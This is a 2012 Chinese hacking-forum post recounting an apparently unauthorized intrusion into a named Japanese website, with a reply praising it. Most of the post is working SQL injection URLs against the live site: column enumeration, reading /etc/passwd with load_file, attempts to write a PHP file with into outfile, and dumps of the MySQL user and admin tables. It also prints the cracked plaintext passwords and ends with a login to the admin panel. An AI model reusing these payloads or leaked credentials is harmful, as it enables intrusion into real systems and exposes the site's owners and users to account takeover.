中国网络渗透测试联盟

标题: 原创 检测汉奸站全过程 [打印本页]

作者: xiancda    时间: 2012-9-17 16:22
标题: 原创 检测汉奸站全过程
补:www.zuaa.jp测试

; V; J8 I0 I4 E3 u4 k* y
0 _: ^) i2 _3 u0x01. 检测 www.zuaa.jp 收集数据" c! u9 O5 l& z6 `1 x
[attach]73[/attach]; }" ?1 o: C7 z/ V1 a, d
/ E$ Z  \# n* }1 ~6 W% t4 Z
whatweb# B# |7 r6 W" f
[attach]74[/attach]
. @. v+ ]8 Z. g! |' m. P7 r# X
. L$ }/ R) _2 e0 }利用NMAP扫描
" V% U* t$ {$ i( [2 V. N* i; M[attach]75[/attach]
& D7 o4 ]+ ]+ }* u中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持8 X6 {* L. f5 v) ?
0x02.找注入点
7 x3 X+ B" r7 G% m1 M4 x* e找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=390
4 c, a" G! k1 @. v4 Q+ v[attach]76[/attach]+ L0 {# l% p/ y7 ]

; C4 h1 W* J3 o; ?/ |! |* F# D, f, ^0x03.order by
& ]6 c+ S8 G3 k9 m: i" A             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
  o0 U6 e( s# ^[attach]77[/attach]) }; L3 U. z- e4 P; Q
order by 28报错,order by 27正常! H+ B$ b" e3 f5 I' x5 ^9 \

# P; N- p2 A( S& s! d' y0x04.   union手动查询' U* C7 P: u& k+ v2 F
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 # m; a2 d0 r5 I' I$ e) l; Q8 J
添加到 27 时正常显示
1 @5 S% G$ O9 B0 i# S6 I. g[attach]78[/attach]
* H  K4 b6 I* T; d- j) ~中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持2 u" S4 a: o4 N+ K6 L# f

' Z5 G3 p. {$ w5 u' G' f4 x0x05. info:
, J5 l8 ~! Q& @. [http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
# h* h( F2 e, {* I+ t[attach]79[/attach]
8 C4 R7 n9 e9 c6 P9 l( Q/ Q% fuser:            root@localhost+ o( s' s) Q9 N) \' t
database:    openpne8 p4 l- Y- a. u" q) n, g7 S
version:      4.1.22( A# t% A- H* R7 _8 D! M
os:             portbld-freebsd5.4
4 b% A5 L8 }( ]% ^) L; N( w& F6 e) @$ c# ]+ O4 N2 u( |0 t
0x06. root用户
& g6 k& W! d: P1 E! q( t利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)
# G. o% e, B& D' j1 D9 B8 whttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 % T; Q4 n5 N9 Y5 Y
[attach]80[/attach]
2 E5 d$ H2 D& F通过工具转换
  ?! S" f% [6 l& S% b[attach]81[/attach]
5 y7 K3 A) w  J中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持  x/ y* e3 J" N; _* p; P* O" i
3 I7 R8 y) Q0 o& C
0x07. 利用 into outfile! {* {5 U$ H+ m3 }- y1 t, Y
全部都失败, `) g$ \4 ^& t; H; g# `/ W
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php; U( N- `. ~, S+ @9 `$ z
4 b& h2 j- M. F
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php
# l/ c3 I3 \# a5 W8 O$ b+ S
4 u  ?. f0 j: |2 R页面显示“MDB2 Error:syntax error”; B9 l% b$ U; ~* t

( a1 q- ^/ x  R4 o3 {0x08. 利用 mysql 4.1
5 F4 s" M) `  Q+ q4 t  P* F! V猜常规表名,字段未果 工具 sqlmap
& I) |5 J: s5 w' h中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
, c* P1 ?; p2 o& p1 w& T
' A, P3 _) n0 V3 p1 c[attach]82[/attach]" P  B4 d* K7 C% f& R

3 W' G  j+ G) ~9 R& J- |0x09. 查找后台
) n. i4 O2 P  Z1 N3 B) D$ g" ~  t利用 现有的各种 后台工具尝试都不行! T  F. ^+ f, [" G( V6 `" W/ k
% p5 e3 I. J( X$ K5 o5 |
0x10.  MySL外联方法) |. [/ b& }0 e$ b4 U+ N, A2 ~
从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行& i! g/ o! {, I: r
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user( Y* Q* ^# j- ~
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user% I# e! f1 e, G! a2 Z! v/ R
[attach]83[/attach]6 j/ b0 E2 F, q. F, t' I# W
这个可以在 www.cmd5.com 解密
  M2 I8 i9 b2 W, v& Oroot:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
/ r8 v3 L" Q9 R2 g% ~4 nchen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97( U/ t9 i2 D! B- J* ~$ U* |5 r9 R
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
) I, ]0 F; d- Q) f  A) C6 L6 u* B5 ozuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
' Z2 ^2 s, u6 u) r* E工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知
, J! j) E' K  x; R[attach]84[/attach]% B0 H5 C, j' U% P) n; A
( {- Y: S$ A" m0 M0 x
0x11. 网站突破
3 P1 r+ I8 Y) R发现网站的源程序 openpne, google 下载 openpne 源码
. i; K- P9 I  L% |3 Z[attach]85[/attach]  M7 I+ W# }- A  O8 g4 Y
8 [/ j# h2 ^' D0 h" e$ D
0x12. 默认信息利用
2 s* z# F" e4 X1 j. ^http://sns.zuaa.jp/?m=admin&a=page_login
& x$ n, y; @0 Z+ W/ {& |[attach]86[/attach]$ F! I6 D- @% M/ x" A+ R5 ^, B
表名 (c_admin_user) ,字段名(username,password)
0 i2 b, b. G5 j9 M" ~) @: Fhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user& I- m6 Q' x: ^
[attach]87[/attach]7 k" U/ w. b& @9 ~/ s7 ^0 t
解密' ~/ q, w+ b+ U0 d
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
# f. m7 Q0 f" E% f) g( ], nzuaajp:c0923ec5857796a393da99905008c176,          zju1897
& C( w& m, s- B7 G" r( }2 I( N3 z! W: R/ U; N1 a
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
% R* _/ R0 M$ ~& C6 g* B
9 G: V- O# T5 X! J0x13. 登录后台- x+ `8 \1 t+ b: Q7 S! ?5 x
[attach]88[/attach]4 K5 x4 k) N" O# E+ ?# e
8 O6 \9 O% u9 J, U. k

$ ~9 r3 \9 L% @( E0x14. 小结; S' }# V3 u9 |
利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。4 N- A. N% M& Q' f% E
感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点& M. M% j& T7 F& ^$ p& E; c
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain+ T, r* s) P; F) t7 E0 S, w, ^2 H* ~
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持( L$ `1 J  T. E! i+ T) m7 N9 R

5 c5 L2 T) q; `! [4 h$ `最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!
+ g/ e/ {1 z& ?) `8 s# H
作者: 荒村狂客    时间: 2012-9-19 08:27
哪个牛人 费的这劲 入侵的




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2